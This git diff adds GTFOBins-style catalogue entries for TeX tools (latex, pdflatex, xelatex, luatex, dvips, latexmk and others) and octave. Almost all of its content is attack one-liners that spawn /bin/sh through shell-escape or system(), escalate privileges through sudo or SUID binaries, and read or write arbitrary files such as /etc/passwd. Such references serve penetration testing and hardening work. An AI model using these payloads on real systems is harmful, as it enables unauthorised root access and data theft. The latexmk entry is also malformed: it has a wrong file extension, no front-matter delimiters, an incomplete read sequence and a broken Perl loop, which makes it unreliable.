diff --git a/_gtfobins/dvips.md b/_gtfobins/dvips.md new file mode 100644 index 0000000..0b21e74 --- /dev/null +++ b/_gtfobins/dvips.md @@ -0,0 +1,16 @@ +--- +description: The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target. +functions: + shell: + - code: | + tex '\special{psfile="`/bin/sh 1>&0"}\end' + dvips -R0 texput.dvi + sudo: + - code: | + tex '\special{psfile="`/bin/sh 1>&0"}\end' + sudo dvips -R0 texput.dvi + limited-suid: + - code: | + tex '\special{psfile="`/bin/sh 1>&0"}\end' + ./dvips -R0 texput.dvi +--- diff --git a/_gtfobins/latex.md b/_gtfobins/latex.md new file mode 100644 index 0000000..17919a0 --- /dev/null +++ b/_gtfobins/latex.md @@ -0,0 +1,21 @@ +--- +functions: + shell: + - code: | + latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' + file-read: + - description: The read file will be part of the output. + code: | + latex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' + strings article.dvi + sudo: + - description: The read file will be part of the output. + code: | + sudo latex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' + strings article.dvi + - code: | + sudo latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' + limited-suid: + - code: | + ./latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' +--- diff --git a/_gtfobins/latexmk.tex b/_gtfobins/latexmk.tex new file mode 100644 index 0000000..bb43d63 --- /dev/null +++ b/_gtfobins/latexmk.tex @@ -0,0 +1,14 @@ +description: This allows to execute [`perl`](/gtfobins/perl/) code. +functions: + shell: + - code: latexmk -e 'exec "/bin/sh";' + - code: latexmk -latex='/bin/sh #' /dev/null + file-read: + - code: latexmk -e 'open(X,"/etc/passwd");while(){print $_;}exit' + - description: The read file will be part of the output. + code: | + TF=$(mktemp) + echo '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' >$TF + strings tmp.dvi + sudo: + - code: sudo latexmk -e 'exec "/bin/sh";' diff --git a/_gtfobins/lualatex.md b/_gtfobins/lualatex.md new file mode 100644 index 0000000..9a85d99 --- /dev/null +++ b/_gtfobins/lualatex.md @@ -0,0 +1,10 @@ +--- +description: This allows to execute [`lua`](/gtfobins/lua/) code. +functions: + shell: + - code: lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}' + sudo: + - code: sudo lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}' + limited-suid: + - code: ./lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}' +--- diff --git a/_gtfobins/luatex.md b/_gtfobins/luatex.md new file mode 100644 index 0000000..1014648 --- /dev/null +++ b/_gtfobins/luatex.md @@ -0,0 +1,10 @@ +--- +description: This allows to execute [`lua`](/gtfobins/lua/) code. +functions: + shell: + - code: luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end' + sudo: + - code: sudo luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end' + limited-suid: + - code: ./luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end' +--- diff --git a/_gtfobins/octave.md b/_gtfobins/octave.md new file mode 100644 index 0000000..df881f7 --- /dev/null +++ b/_gtfobins/octave.md @@ -0,0 +1,14 @@ +--- +description: The payloads are compatible with GUI. +functions: + shell: + - code: octave-cli --eval 'system("/bin/sh")' + file-write: + - code: octave-cli --eval 'filename = "file_to_write"; fid = fopen(filename, "w"); fputs(fid, "DATA"); fclose(fid);' + file-read: + - code: octave-cli --eval 'format none; fid = fopen("file_to_read"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);' + sudo: + - code: sudo octave-cli --eval 'system("/bin/sh")' + limited-suid: + - code: ./octave-cli --eval 'system("/bin/sh")' +--- diff --git a/_gtfobins/pdflatex.md b/_gtfobins/pdflatex.md new file mode 100644 index 0000000..2c8530b --- /dev/null +++ b/_gtfobins/pdflatex.md @@ -0,0 +1,21 @@ +--- +functions: + shell: + - code: | + pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' + file-read: + - description: The read file will be part of the output. + code: | + pdflatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' + pdftotext article.pdf - + sudo: + - description: The read file will be part of the output. + code: | + sudo pdflatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' + pdftotext article.pdf - + - code: | + sudo pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' + limited-suid: + - code: | + ./pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' +--- diff --git a/_gtfobins/pdftex.md b/_gtfobins/pdftex.md new file mode 100644 index 0000000..56199a4 --- /dev/null +++ b/_gtfobins/pdftex.md @@ -0,0 +1,12 @@ +--- +functions: + shell: + - code: | + pdftex --shell-escape '\write18{/bin/sh}\end' + sudo: + - code: | + sudo pdftex --shell-escape '\write18{/bin/sh}\end' + limited-suid: + - code: | + ./pdftex --shell-escape '\write18{/bin/sh}\end' +--- diff --git a/_gtfobins/tex.md b/_gtfobins/tex.md new file mode 100644 index 0000000..9b2830d --- /dev/null +++ b/_gtfobins/tex.md @@ -0,0 +1,12 @@ +--- +functions: + shell: + - code: | + tex --shell-escape '\write18{/bin/sh}\end' + sudo: + - code: | + sudo tex --shell-escape '\write18{/bin/sh}\end' + limited-suid: + - code: | + ./tex --shell-escape '\write18{/bin/sh}\end' +--- diff --git a/_gtfobins/xelatex.md b/_gtfobins/xelatex.md new file mode 100644 index 0000000..7b0713a --- /dev/null +++ b/_gtfobins/xelatex.md @@ -0,0 +1,21 @@ +--- +functions: + shell: + - code: | + xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' + file-read: + - description: The read file will be part of the output. + code: | + xelatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' + strings article.dvi + sudo: + - description: The read file will be part of the output. + code: | + sudo xelatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' + strings article.dvi + - code: | + sudo xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' + limited-suid: + - code: | + ./xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' +--- diff --git a/_gtfobins/xetex.md b/_gtfobins/xetex.md new file mode 100644 index 0000000..cfe7926 --- /dev/null +++ b/_gtfobins/xetex.md @@ -0,0 +1,12 @@ +--- +functions: + shell: + - code: | + xetex --shell-escape '\write18{/bin/sh}\end' + sudo: + - code: | + sudo xetex --shell-escape '\write18{/bin/sh}\end' + limited-suid: + - code: | + ./xetex --shell-escape '\write18{/bin/sh}\end' +---